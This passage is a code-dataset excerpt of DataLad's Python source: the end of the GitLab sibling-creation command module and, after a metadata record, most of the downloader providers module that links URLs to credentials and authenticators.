package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GitLab instance\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport warnings\n\nfrom datalad.support.exceptions import CapturedException\n\nfrom ..distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\n# bound methods\nfrom ..distribution.siblings import Siblings\nfrom ..dochelpers import exc_str\nfrom ..interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom ..interface.common_opts import (\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom ..local.subdatasets import Subdatasets\nfrom ..support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom ..support.param import Parameter\nfrom ..utils import ensure_list\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gitlab')\n\nknown_layout_labels = ('collection', 'flat')\nknown_access_labels = ('http', 'ssh', 'ssh+http')\n\n\n@build_doc\nclass CreateSiblingGitlab(Interface):\n \"\"\"Create dataset sibling at a GitLab site\n\n An existing GitLab project, or a project created via the GitLab web\n interface can be configured as a sibling with the :command:`siblings`\n command. Alternatively, this command can create a GitLab project at any\n location/path a given user has appropriate permissions for. This is\n particularly helpful for recursive sibling creation for subdatasets. API\n access and authentication are implemented via python-gitlab, and all its\n features are supported. A particular GitLab site must be configured in a\n named section of a python-gitlab.cfg file (see\n https://python-gitlab.readthedocs.io/en/stable/cli-usage.html#configuration-file-format\n for details), such as::\n\n [mygit]\n url = https://git.example.com\n api_version = 4\n private_token = abcdefghijklmnopqrst\n\n Subsequently, this site is identified by its name ('mygit' in the example\n above).\n\n (Recursive) sibling creation for all, or a selected subset of subdatasets\n is supported with two different project layouts (see --layout):\n\n \"flat\"\n All datasets are placed as GitLab projects in the same group. The project name\n of the top-level dataset follows the configured\n datalad.gitlab-SITENAME-project configuration. The project names of\n contained subdatasets extend the configured name with the subdatasets'\n s relative path within the root dataset, with all path separator\n characters replaced by '-'. This path separator is configurable\n (see Configuration).\n \"collection\"\n A new group is created for the dataset hierarchy, following the\n datalad.gitlab-SITENAME-project configuration. The root dataset is placed\n in a \"project\" project inside this group, and all nested subdatasets are\n represented inside the group using a \"flat\" layout. The root datasets\n project name is configurable (see Configuration).\n\n GitLab cannot host dataset content. However, in combination with\n other data sources (and siblings), publishing a dataset to GitLab can\n facilitate distribution and exchange, while still allowing any dataset\n consumer to obtain actual data content from alternative sources.\n\n *Configuration*\n\n Many configuration switches and options for GitLab sibling creation can\n be provided as arguments to the command. However, it is also possible to\n specify a particular setup in a dataset's configuration. 
This is\n particularly important when managing large collections of datasets.\n Configuration options are:\n\n \"datalad.gitlab-default-site\"\n Name of the default GitLab site (see --site)\n \"datalad.gitlab-SITENAME-siblingname\"\n Name of the sibling configured for the local dataset that points\n to the GitLab instance SITENAME (see --name)\n \"datalad.gitlab-SITENAME-layout\"\n Project layout used at the GitLab instance SITENAME (see --layout)\n \"datalad.gitlab-SITENAME-access\"\n Access method used for the GitLab instance SITENAME (see --access)\n \"datalad.gitlab-SITENAME-project\"\n Project \"location/path\" used for a datasets at GitLab instance\n SITENAME (see --project). Configuring this is useful for deriving\n project paths for subdatasets, relative to superdataset.\n The root-level group (\"location\") needs to be created beforehand via\n GitLab's web interface.\n \"datalad.gitlab-default-projectname\"\n The collection layout publishes (sub)datasets as projects\n with a custom name. The default name \"project\" can be overridden with\n this configuration.\n \"datalad.gitlab-default-pathseparator\"\n The flat and collection layout represent subdatasets with project names\n that correspond to their path within the superdataset, with the regular path separator replaced\n with a \"-\": superdataset-subdataset. This configuration can be used to override\n this default separator.\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gitlab instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n \"\"\"\n _params_ = dict(\n path=Parameter(\n args=('path',),\n metavar='PATH',\n nargs='*',\n doc=\"\"\"selectively create siblings for any datasets underneath a given\n path. By default only the root dataset is considered.\"\"\"),\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"reference or root dataset. If no path constraints are given,\n a sibling for this dataset will be created. In this and all other\n cases, the reference dataset is also consulted for the GitLab\n configuration, and desired project layout. If no dataset is given,\n an attempt is made to identify the dataset based on the current\n working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n site=Parameter(\n args=('--site',),\n metavar='SITENAME',\n doc=\"\"\"name of the GitLab site to create a sibling at. Must match an\n existing python-gitlab configuration section with location and\n authentication settings (see\n https://python-gitlab.readthedocs.io/en/stable/cli-usage.html#configuration).\n By default the dataset configuration is consulted.\n \"\"\",\n constraints=EnsureNone() | EnsureStr()),\n project=Parameter(\n args=('--project',),\n metavar='NAME/LOCATION',\n doc=\"\"\"project name/location at the GitLab site. If a subdataset of the\n reference dataset is processed, its project path is automatically\n determined by the `layout` configuration, by default. 
Users need to\n create the root-level GitLab group (NAME) via the webinterface\n before running the command.\n \"\"\",\n constraints=EnsureNone() | EnsureStr()),\n layout=Parameter(\n args=('--layout',),\n constraints=EnsureChoice(None, *known_layout_labels),\n doc=\"\"\"layout of projects at the GitLab site, if a collection, or\n a hierarchy of datasets and subdatasets is to be created.\n By default the dataset configuration is consulted.\n \"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name to represent the GitLab sibling remote in the local\n dataset installation. If not specified a name is looked up in the\n dataset configuration, or defaults to the `site` name\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure'),\n doc=\"\"\"desired behavior when already existing or configured\n siblings are discovered. 'skip': ignore; 'error': fail, if access\n URLs differ; 'reconfigure': use the existing repository and\n reconfigure the local dataset to use it as a sibling\"\"\",),\n access=Parameter(\n args=(\"--access\",),\n constraints=EnsureChoice(None, *known_access_labels),\n doc=\"\"\"access method used for data transfer to and from the sibling.\n 'ssh': read and write access used the SSH protocol; 'http': read and\n write access use HTTP requests; 'ssh+http': read access is done via\n HTTP and write access performed with SSH. Dataset configuration is\n consulted for a default, 'http' is used otherwise.\"\"\",),\n description=Parameter(\n args=(\"--description\",),\n doc=\"\"\"brief description for the GitLab project (displayed on the\n site)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n publish_depends=publish_depends,\n dry_run=Parameter(\n args=(\"--dry-run\",),\n action=\"store_true\",\n doc=\"\"\"if set, no repository will be created, only tests for\n name collisions will be performed, and would-be repository names\n are reported for all relevant datasets\"\"\"),\n dryrun=Parameter(\n args=(\"--dryrun\",),\n action=\"store_true\",\n doc=\"\"\"Deprecated. 
Use the renamed\n ``dry_run||--dry-run`` parameter\"\"\")\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_gitlab')\n @eval_results\n def __call__(\n path=None,\n *,\n site=None,\n project=None,\n layout=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n access=None,\n publish_depends=None,\n description=None,\n dryrun=False,\n dry_run=False):\n if dryrun and not dry_run:\n # the old one is used, and not in agreement with the new one\n warnings.warn(\n \"datalad-create-sibling-github's `dryrun` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the renamed `dry_run/--dry-run` option instead.\",\n DeprecationWarning)\n dry_run = dryrun\n path = resolve_path(ensure_list(path), ds=dataset) \\\n if path else None\n\n if project and (recursive or (path and len(path) > 1)):\n raise ValueError(\n 'Providing a GitLab project name/location cannot be combined '\n 'with recursive operation or multiple paths, as each dataset '\n 'needs to be mapped onto its own individual project.')\n # what to operate on\n ds = require_dataset(\n dataset, check_installed=True, purpose='create GitLab sibling(s)')\n\n # cache for objects of gitlab sites (we could face different ones\n # in a single hierarchy, cache them to avoid duplicate initialization\n # while still being able to process each dataset individually\n siteobjs = dict()\n\n # which datasets to process?\n if path is None or ds.pathobj in path:\n for r in _proc_dataset(\n ds, ds,\n site, project, name, layout, existing, access,\n dry_run, siteobjs, publish_depends, description):\n yield r\n # we need to find a subdataset when recursing, or when there is a path that\n # could point to one, we have to exclude the parent dataset in this test\n # to avoid undesired level-1 recursion into subdatasets\n if any(p != ds.pathobj for p in (path or [])) or recursive:\n # also include any matching subdatasets\n subds = ds.subdatasets(\n path=path,\n # we can only operate on present datasets\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n contains=None,\n bottomup=False,\n result_xfm='datasets',\n result_renderer='disabled',\n return_type='list')\n if not subds:\n # we didn't find anything to operate on, let the user know\n res_kwargs = {'status': 'impossible', 'refds': ds.path,\n 'type':'dataset', 'logger': lgr,\n 'action': 'create_sibling_gitlab'}\n if path is not None:\n for p in path:\n yield dict(\n path=p,\n message=('No installed dataset found under %s, forgot to \"get\" it?' % p),\n **res_kwargs\n )\n else:\n yield dict(\n path=ds.path,\n message=('No installed subdatasets found underneath %s, forgot to \"get\" any?' 
% ds.path),\n **res_kwargs)\n else:\n for sub in subds:\n for r in _proc_dataset(\n ds, sub,\n site, project, name, layout, existing, access,\n dry_run, siteobjs, publish_depends, description):\n yield r\n\n return\n\n\ndef _proc_dataset(refds, ds, site, project, remotename, layout, existing,\n access, dry_run, siteobjs, depends, description):\n # basic result setup\n res_kwargs = dict(\n action='create_sibling_gitlab',\n refds=refds.path,\n path=ds.path,\n type='dataset',\n logger=lgr,\n )\n if description:\n res_kwargs['description'] = description\n\n if site is None:\n # always try pulling the base config from a parent dataset\n # even if paths were given (may be overwritten later)\n basecfgsite = ds.config.get('datalad.gitlab-default-site', None)\n\n # let the dataset config overwrite the target site, if none\n # was given\n site = refds.config.get(\n 'datalad.gitlab-default-site', basecfgsite) \\\n if site is None else site\n if site is None:\n # this means the most top-level dataset has no idea about\n # gitlab, and no site was specified as an argument\n # fail rather then give an error result, as this is very\n # unlikely to be intentional\n raise ValueError(\n 'No GitLab site was specified (--site) or configured '\n 'in {} (datalad.gitlab.default-site)'.format(ds))\n res_kwargs['site'] = site\n\n # determine target remote name, unless given\n if remotename is None:\n remotename_var = 'datalad.gitlab-{}-siblingname'.format(site)\n remotename = ds.config.get(\n remotename_var,\n # use config from parent, if needed\n refds.config.get(\n remotename_var,\n # fall back on site name, if nothing else can be used\n site))\n res_kwargs['sibling'] = remotename\n # check against existing remotes\n dremotes = {\n r['name']: r\n for r in ds.siblings(\n action='query',\n # fastest possible\n get_annex_info=False,\n recursive=False,\n return_type='generator',\n result_renderer='disabled')\n }\n if remotename in dremotes and existing not in ['replace', 'reconfigure']:\n # we already know a sibling with this name\n yield dict(\n res_kwargs,\n status='error' if existing == 'error' else 'notneeded',\n message=('already has a configured sibling \"%s\"', remotename),\n )\n return\n\n if layout is None:\n # figure out the layout of projects on the site\n # use the reference dataset as default, and fall back\n # on 'collection' as the most generic method of representing\n # the filesystem in a group/subproject structure\n layout_var = 'datalad.gitlab-{}-layout'.format(site)\n layout = ds.config.get(\n layout_var, refds.config.get(\n layout_var, 'collection'))\n if layout not in known_layout_labels:\n raise ValueError(\n \"Unknown site layout '{}' given or configured, \"\n \"known ones are: {}\".format(layout, known_layout_labels))\n\n if access is None:\n access_var = 'datalad.gitlab-{}-access'.format(site)\n access = ds.config.get(\n access_var, refds.config.get(\n access_var, 'http'))\n if access not in known_access_labels:\n raise ValueError(\n \"Unknown site access '{}' given or configured, \"\n \"known ones are: {}\".format(access, known_access_labels))\n\n pathsep = ds.config.get(\"datalad.gitlab-default-pathseparator\", \"-\")\n project_stub = \\\n ds.config.get(\"datalad.gitlab-default-projectname\", \"project\")\n project_var = 'datalad.gitlab-{}-project'.format(site)\n process_root = refds == ds\n if project is None:\n # look for a specific config in the dataset\n project = ds.config.get(project_var, None)\n\n if project and process_root and layout != 'flat':\n # the root of a collection\n 
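# For example (hypothetical values): with a configured project of\n        # 'mylab/studies', layout='collection' and the default project_stub of\n        # 'project', the root dataset would be published at\n        # 'mylab/studies/project', while its subdatasets become further\n        # projects inside the 'mylab/studies' group (see the layout-specific\n        # derivation below).\n        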
project = f'{project}/{project_stub}'\n elif project is None and not process_root:\n # check if we can build one from the refds config\n ref_project = refds.config.get(project_var, None)\n if ref_project:\n # layout-specific derivation of a path from\n # the reference dataset configuration\n rproject = ds.pathobj.relative_to(refds.pathobj).as_posix()\n if layout == 'collection':\n project = '{}/{}'.format(\n ref_project,\n rproject.replace('/', pathsep))\n else:\n project = '{}{}{}'.format(\n ref_project,\n pathsep,\n rproject.replace('/', pathsep))\n\n if project is None:\n yield dict(\n res_kwargs,\n status='error',\n message='No project name/location specified, and no configuration '\n 'to derive one',\n )\n return\n\n res_kwargs['project'] = project\n\n if dry_run:\n # this is as far as we can get without talking to GitLab\n yield dict(\n res_kwargs,\n status='ok',\n dryrun=True,\n )\n return\n\n # and now talk to GitLab for real\n site_api = siteobjs[site] if site in siteobjs else GitLabSite(site)\n\n site_project = site_api.get_project(project)\n if site_project is None:\n try:\n site_project = site_api.create_project(project, description)\n # report success\n message = \"sibling repository '%s' created at %s\",\\\n remotename, site_project.get('web_url', None)\n yield dict(\n res_kwargs,\n # relay all attributes\n project_attributes=site_project,\n message=message,\n status='ok',\n )\n except Exception as e:\n ce = CapturedException(e)\n yield dict(\n res_kwargs,\n # relay all attributes\n status='error',\n message=('Failed to create GitLab project: %s', ce),\n exception=ce\n )\n return\n else:\n # there already is a project\n if existing == 'error':\n # be nice and only actually error if there is a real mismatch\n if remotename not in dremotes:\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but no sibling with name '%s' is configured, \"\n \"maybe use --existing=reconfigure\",\n project, site, remotename,\n )\n )\n return\n elif access in ('ssh', 'ssh+http') \\\n and dremotes[remotename].get(\n 'url', None) != site_project.get(\n # use False as a default so that there is a\n # mismatch, complain if both are missing\n 'ssh_url_to_repo', False):\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but SSH access URL '%s' does not match '%s', \"\n \"maybe use --existing=reconfigure\",\n project, site,\n dremotes[remotename].get('url', None),\n site_project.get('ssh_url_to_repo', None)\n )\n )\n return\n elif access == 'http' \\\n and dremotes[remotename].get(\n 'url', None) != site_project.get(\n # use False as a default so that there is a\n # mismatch, veen if both are missing\n 'http_url_to_repo', False):\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but HTTP access URL '%s' does not match '%s', \"\n \"maybe use --existing=reconfigure\",\n project, site,\n dremotes[remotename].get('url', None),\n site_project.get('http_url_to_repo', None)\n )\n )\n return\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='notneeded',\n message=(\n \"There is already a project at '%s' on site '%s'\",\n project, site,\n )\n )\n\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n ignore_var = 
'remote.{}.annex-ignore'.format(remotename)\n if ignore_var not in ds.config:\n ds.config.add(ignore_var, 'true', scope='local')\n\n for res in ds.siblings(\n 'configure',\n name=remotename,\n url=site_project['http_url_to_repo']\n if access in ('http', 'ssh+http')\n else site_project['ssh_url_to_repo'],\n pushurl=site_project['ssh_url_to_repo']\n if access in ('ssh', 'ssh+http')\n else None,\n recursive=False,\n publish_depends=depends,\n result_renderer='disabled',\n return_type='generator'):\n yield res\n\n\nclass GitLabSite(object):\n def __init__(self, site):\n import gitlab\n self.gitlab = gitlab\n try:\n self.site = gitlab.Gitlab.from_config(site)\n except gitlab.config.GitlabDataError as e:\n raise ValueError(\n '{}, please configure access to this GitLab instance'.format(\n str(e)))\n\n def get_project(self, path):\n try:\n return self.site.projects.get(path).attributes\n except self.gitlab.GitlabGetError as e:\n lgr.debug(\"Project with path '%s' does not yet exist at site '%s'\",\n path, self.site.url)\n return None\n\n def create_project(self, path, description=None):\n path_l = path.split('/')\n namespace_id = self._obtain_namespace(path_l)\n # check for options:\n # https://gitlab.com/help/api/projects.md#create-project\n props = dict(\n name=path_l[-1],\n namespace_id=namespace_id,\n )\n if description:\n props['description'] = description\n project = self.site.projects.create(props)\n return project.attributes\n\n def _obtain_namespace(self, path_l):\n\n if len(path_l) == 1:\n # no nesting whatsoever\n return None\n\n try:\n namespace_id = self.site.groups.get(\n '/'.join(path_l[:-1])).get_id()\n lgr.debug(\"Found existing parent group '%s' with ID %s\",\n '/'.join(path_l[:-1]), namespace_id)\n except self.gitlab.GitlabGetError as e:\n try:\n if len(path_l) > 2:\n parent_group = self.site.groups.get(\n '/'.join(path_l[:-2]))\n else:\n parent_group = None\n except self.gitlab.GitlabGetError as e:\n raise ValueError(\n \"No parent group {} for project {} found, \"\n \"and a group {} also does not exist. 
At most one \"\n \"parent group would be created.\".format(\n '/'.join(path_l[:-1]),\n '/'.join(path_l),\n '/'.join(path_l[:-2]),\n ))\n # create the group for the target project\n try:\n # prevent failure due to specification of a users personal\n # group, always exists, cannot and must not be created\n self.site.auth()\n if len(path_l) == 2 \\\n and path_l[0] == self.site.user.attributes.get(\n 'username', None):\n # attempt to create a personal project in the users\n # top-level personal group-- this is the same as\n # having no parent namespace, don't attempt to\n # create the group\n return None\n namespace_id = self.site.groups.create(dict(\n name=path_l[-2],\n path=path_l[-2],\n parent_id=parent_group.get_id() if parent_group else None)\n ).get_id()\n except self.gitlab.GitlabCreateError as e:\n raise RuntimeError(\n \"Failed to create parent group '{}' under {}: {}\".format(\n path_l[-2],\n repr(parent_group.attributes['full_path'])\n if parent_group else 'the account root',\n str(e)),\n )\n return namespace_id\n" }, { "alpha_fraction": 0.585260272026062, "alphanum_fraction": 0.586125910282135, "avg_line_length": 38.83743667602539, "blob_id": "571b25cf609407b6655cf6a21c1d832302d4114e", "content_id": "42aa355a6f76a3193f52d76d4ee3f29f5024769e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24261, "license_type": "permissive", "max_line_length": 121, "num_lines": 609, "path": "/datalad/downloaders/providers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Data providers - bind downloaders and credentials together\n\"\"\"\n\nfrom glob import glob\nfrom logging import getLogger\n\nimport re\nfrom os.path import dirname, abspath, join as pathjoin\nfrom urllib.parse import urlparse\n\nfrom .base import NoneAuthenticator, NotImplementedAuthenticator\n\nfrom .http import (\n HTMLFormAuthenticator,\n HTTPAnonBearerTokenAuthenticator,\n HTTPAuthAuthenticator,\n HTTPBasicAuthAuthenticator,\n HTTPDigestAuthAuthenticator,\n HTTPBearerTokenAuthenticator,\n HTTPDownloader,\n)\nfrom .s3 import S3Authenticator, S3Downloader\nfrom .shub import SHubDownloader\nfrom configparser import ConfigParser as SafeConfigParserWithIncludes\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.network import RI\nfrom datalad.support import path\nfrom datalad.utils import (\n auto_repr,\n ensure_list_from_str,\n get_dataset_root,\n Path,\n)\n\nfrom ..interface.common_cfg import dirs\n\nlgr = getLogger('datalad.downloaders.providers')\n\n# dict to bind authentication_type's to authenticator classes\n# parameters will be fetched from config file itself\nAUTHENTICATION_TYPES = {\n 'html_form': HTMLFormAuthenticator,\n 'http_auth': HTTPAuthAuthenticator,\n 'http_basic_auth': HTTPBasicAuthAuthenticator,\n 'http_digest_auth': HTTPDigestAuthAuthenticator,\n 'bearer_token': HTTPBearerTokenAuthenticator,\n 'bearer_token_anon': HTTPAnonBearerTokenAuthenticator,\n 'aws-s3': S3Authenticator, # TODO: check if having '-' is kosher\n 'nda-s3': S3Authenticator,\n 'loris-token': 
HTTPBearerTokenAuthenticator,\n 'xnat': NotImplementedAuthenticator,\n 'none': NoneAuthenticator,\n}\n\nfrom datalad.downloaders import CREDENTIAL_TYPES\n\n\n@auto_repr\nclass Provider(object):\n \"\"\"Class to bring together url_res, credential, and authenticator\n \"\"\"\n # TODO: we might need a lazy loading of the submodules which would provide\n # specific downloaders while importing needed Python modules \"on demand\"\n DOWNLOADERS = {\n 'http': {'class': HTTPDownloader, 'externals': {'requests'}},\n 'https': {'class': HTTPDownloader, 'externals': {'requests'}},\n 'shub': {'class': SHubDownloader, 'externals': {'requests'}},\n 'ftp': {'class': HTTPDownloader, 'externals': {'requests', 'boto'}},\n 's3': {'class': S3Downloader, 'externals': {'boto'}}\n # ... TODO\n }\n\n def __init__(self, name, url_res, credential=None, authenticator=None,\n downloader=None):\n \"\"\"\n Parameters\n ----------\n name: str\n url_res: list of str\n Regular expressions\n credential: Credential, optional\n authenticator: Authenticator, optional\n downloader: Downloader, optional\n\n \"\"\"\n self.name = name\n self.url_res = ensure_list_from_str(url_res)\n self.credential = credential\n self.authenticator = authenticator\n self._downloader = downloader\n\n @property\n def downloader(self):\n return self._downloader\n\n @staticmethod\n def get_scheme_from_url(url):\n \"\"\"Given a URL return scheme to decide which downloader class to use\n \"\"\"\n url_split = urlparse(url)\n return url_split.scheme # , url_split.netloc)\n\n @classmethod\n def _get_downloader_class(cls, url):\n key = cls.get_scheme_from_url(url)\n if key in cls.DOWNLOADERS:\n entry = cls.DOWNLOADERS[key]\n klass = entry['class']\n for ext in entry.get('externals', set()):\n if external_versions[ext] is None:\n raise RuntimeError(\n \"For using %s downloader, you need '%s' dependency \"\n \"which seems to be missing\" % (klass, ext)\n )\n return klass\n else:\n raise ValueError(\"Do not know how to handle url %s for scheme %s. Known: %s\"\n % (url, key, cls.DOWNLOADERS.keys()))\n\n def get_downloader(self, url, **kwargs):\n \"\"\"Assigns proper downloader given the URL\n\n If one is known -- verifies its appropriateness for the given url.\n ATM we do not support multiple types of downloaders per single provider\n \"\"\"\n if self._downloader is None:\n # we need to create a new one\n Downloader = self._get_downloader_class(url)\n # we might need to provide it with credentials and authenticator\n # Let's do via kwargs so we could accommodate cases when downloader does not necessarily\n # cares about those... duck typing or what it is in action\n kwargs = kwargs.copy()\n if self.credential:\n kwargs['credential'] = self.credential\n if self.authenticator:\n kwargs['authenticator'] = self.authenticator\n self._downloader = Downloader(**kwargs)\n return self._downloader\n\n\nclass Providers(object):\n \"\"\"\n\n So we could provide handling for URLs with corresponding credentials\n and specific (reusable) downloader. Internally it contains\n Providers and interfaces them based on a given URL. Each provider\n in turn takes care about associated with it Downloader.\n \"\"\"\n\n _DEFAULT_PROVIDERS = None\n _DS_ROOT = None\n _CONFIG_TEMPLATE = \"\"\"\\\n# Provider configuration file created to initially access\n# {url}\n\n[provider:{name}]\nurl_re = {url_re}\nauthentication_type = {authentication_type}\n# Note that you might need to specify additional fields specific to the\n# authenticator. 
Fow now \"look into the docs/source\" of {authenticator_class}\n# {authentication_type}_\ncredential = {credential_name}\n\n[credential:{credential_name}]\n# If known, specify URL or email to how/where to request credentials\n# url = ???\ntype = {credential_type}\n\"\"\"\n\n def __init__(self, providers=None):\n \"\"\"\n \"\"\"\n self._providers = providers or []\n # a set of providers to handle connections without authentication.\n # Will be setup one per each protocol schema\n self._default_providers = {}\n\n def __repr__(self):\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \"\" if not self._providers else repr(self._providers)\n )\n\n def __len__(self):\n return len(self._providers)\n\n def __getitem__(self, index):\n return self._providers[index]\n\n def __iter__(self):\n return self._providers.__iter__()\n\n @classmethod\n def _get_providers_dirs(cls, dsroot=None):\n \"\"\"Return an ordered dict with directories to look for provider config files\n\n Is implemented as a function to ease mock testing depending on dirs.\n values\n \"\"\"\n paths = dict()\n paths['dist'] = pathjoin(dirname(abspath(__file__)), 'configs')\n if dsroot is not None:\n paths['ds'] = pathjoin(dsroot, '.datalad', 'providers')\n paths['site'] = pathjoin(dirs.site_config_dir, \"providers\") \\\n if dirs.site_config_dir else None\n paths['user'] = pathjoin(dirs.user_config_dir, \"providers\") \\\n if dirs.user_config_dir else None\n return paths\n\n @classmethod\n def _get_configs(cls, dir, files='*.cfg'):\n return glob(pathjoin(dir, files)) if dir is not None else []\n\n @classmethod\n def from_config_files(cls, files=None, reload=False):\n \"\"\"Loads information about related/possible websites requiring authentication from:\n\n - datalad/downloaders/configs/*.cfg files provided by the codebase\n - current dataset .datalad/providers/\n - User's home directory directory (ie ~/.config/datalad/providers/*.cfg)\n - system-wide datalad installation/config (ie /etc/datalad/providers/*.cfg)\n\n For sample configs files see datalad/downloaders/configs/providers.cfg\n\n If files is None, loading is cached between calls. Specify reload=True to force\n reloading of files from the filesystem. The class method reset_default_providers\n can also be called to reset the cached providers.\n \"\"\"\n # lazy part\n # Note, that \"\" is effectively the same as \".\". If CWD is in a dataset's\n # root already, `get_dataset_root` will just return its input. While\n # this is technically correct, we want to use it here in order to\n # figure, whether the dsroot is the same as when we called last time.\n # However, \"\", \".\", etc. would stay the same, whenever we switch into\n # another dataset, causing `from_config_files` to \"think\" nothing\n # changed. Therefore use abspath here.\n dsroot_rel = get_dataset_root(\"\")\n dsroot = abspath(dsroot_rel) if dsroot_rel is not None else None\n if files is None and cls._DEFAULT_PROVIDERS and not reload and dsroot==cls._DS_ROOT:\n return cls._DEFAULT_PROVIDERS\n\n config = SafeConfigParserWithIncludes()\n files_orig = files\n if files is None:\n cls._DS_ROOT = dsroot\n files = []\n for p in cls._get_providers_dirs(dsroot).values():\n files.extend(cls._get_configs(p))\n config.read(files)\n\n # We need first to load Providers and credentials\n # Order matters, because we need to ensure that when\n # there's a conflict between configuration files declared\n # at different precedence levels (ie. 
dataset vs system)\n # the appropriate precedence config wins.\n providers = dict()\n credentials = {}\n\n for section in config.sections():\n if ':' in section:\n type_, name = section.split(':', 1)\n assert type_ in {'provider', 'credential'}, \"we know only providers and credentials, got type %s\" % type_\n items = {\n o: config.get(section, o) for o in config.options(section)\n }\n # side-effect -- items get popped\n locals().get(type_ + \"s\")[name] = getattr(\n cls, '_process_' + type_)(name, items)\n if len(items):\n raise ValueError(\"Unprocessed fields left for %s: %s\" % (name, str(items)))\n else:\n lgr.warning(\"Do not know how to treat section %s here\" % section)\n\n # link credentials into providers\n lgr.debug(\"Assigning credentials into %d providers\", len(providers))\n for provider in providers.values():\n if provider.credential:\n if provider.credential not in credentials:\n raise ValueError(\"Unknown credential %s. Known are: %s\"\n % (provider.credential, \", \".join(credentials.keys())))\n provider.credential = credentials[provider.credential]\n # TODO: Is this the right place to pass dataset to credential?\n provider.credential.set_context(dataset=cls._DS_ROOT)\n\n providers = Providers(list(providers.values()))\n\n if files_orig is None:\n # Store providers for lazy access\n cls._DEFAULT_PROVIDERS = providers\n\n return providers\n\n @classmethod\n def reset_default_providers(cls):\n \"\"\"Resets to None memoized by from_config_files providers\n \"\"\"\n cls._DEFAULT_PROVIDERS = None\n\n @classmethod\n def _process_provider(cls, name, items):\n \"\"\"Process a dictionary specifying the provider and output the Provider instance\n \"\"\"\n assert 'authentication_type' in items, \"Must have authentication_type specified\"\n\n auth_type = items.pop('authentication_type')\n if auth_type not in AUTHENTICATION_TYPES:\n raise ValueError(\"Unknown authentication_type=%s. Known are: %s\"\n % (auth_type, ', '.join(AUTHENTICATION_TYPES)))\n\n if auth_type != 'none':\n authenticator = AUTHENTICATION_TYPES[auth_type](\n # Extract all the fields as keyword arguments\n **{k[len(auth_type) + 1:]: items.pop(k)\n for k in list(items.keys())\n if k.startswith(auth_type + \"_\")}\n )\n else:\n authenticator = None\n\n # bringing url_re to \"standard\" format of a list and populating _providers_ordered\n url_res = ensure_list_from_str(items.pop('url_re', []))\n assert url_res, \"current implementation relies on having url_re defined\"\n\n credential = items.pop('credential', None)\n\n # credential instance will be assigned later after all of them are loaded\n return Provider(name=name, url_res=url_res, authenticator=authenticator,\n credential=credential)\n\n @classmethod\n def _process_credential(cls, name, items):\n assert 'type' in items, \"Credential must specify type. Missing in %s\" % name\n cred_type = items.pop('type')\n if cred_type not in CREDENTIAL_TYPES:\n raise ValueError(\"I do not know type %s credential. 
Known: %s\"\n % (cred_type, CREDENTIAL_TYPES.keys()))\n return CREDENTIAL_TYPES[cred_type](name=name, url=items.pop('url', None))\n\n def reload(self):\n new_providers = self.from_config_files(reload=True)\n self._providers = new_providers._providers\n self._default_providers = new_providers._default_providers\n\n def get_provider(self, url, only_nondefault=False, return_all=False):\n \"\"\"Given a URL returns matching provider\n \"\"\"\n\n # Range backwards to ensure that more locally defined\n # configuration wins in conflicts between url_re\n matching_providers = []\n for provider in self._providers[::-1]:\n for url_re in provider.url_res:\n try:\n if re.match(url_re, url):\n lgr.debug(\"Returning provider %s for url %s\", provider, url)\n matching_providers.append(provider)\n except re.error:\n lgr.warning(\n \"Invalid regex %s in provider %s\"\n % (url_re, provider.name)\n )\n\n if matching_providers:\n if return_all:\n return matching_providers\n if len(matching_providers) > 1:\n lgr.warning(\n \"Multiple providers matched for %s, using the first one\"\n % url)\n return matching_providers[0]\n\n if only_nondefault:\n return None\n\n # None matched -- so we should get a default one per each of used\n # protocols\n scheme = Provider.get_scheme_from_url(url)\n if scheme not in self._default_providers:\n lgr.debug(\"Initializing default provider for %s\", scheme)\n 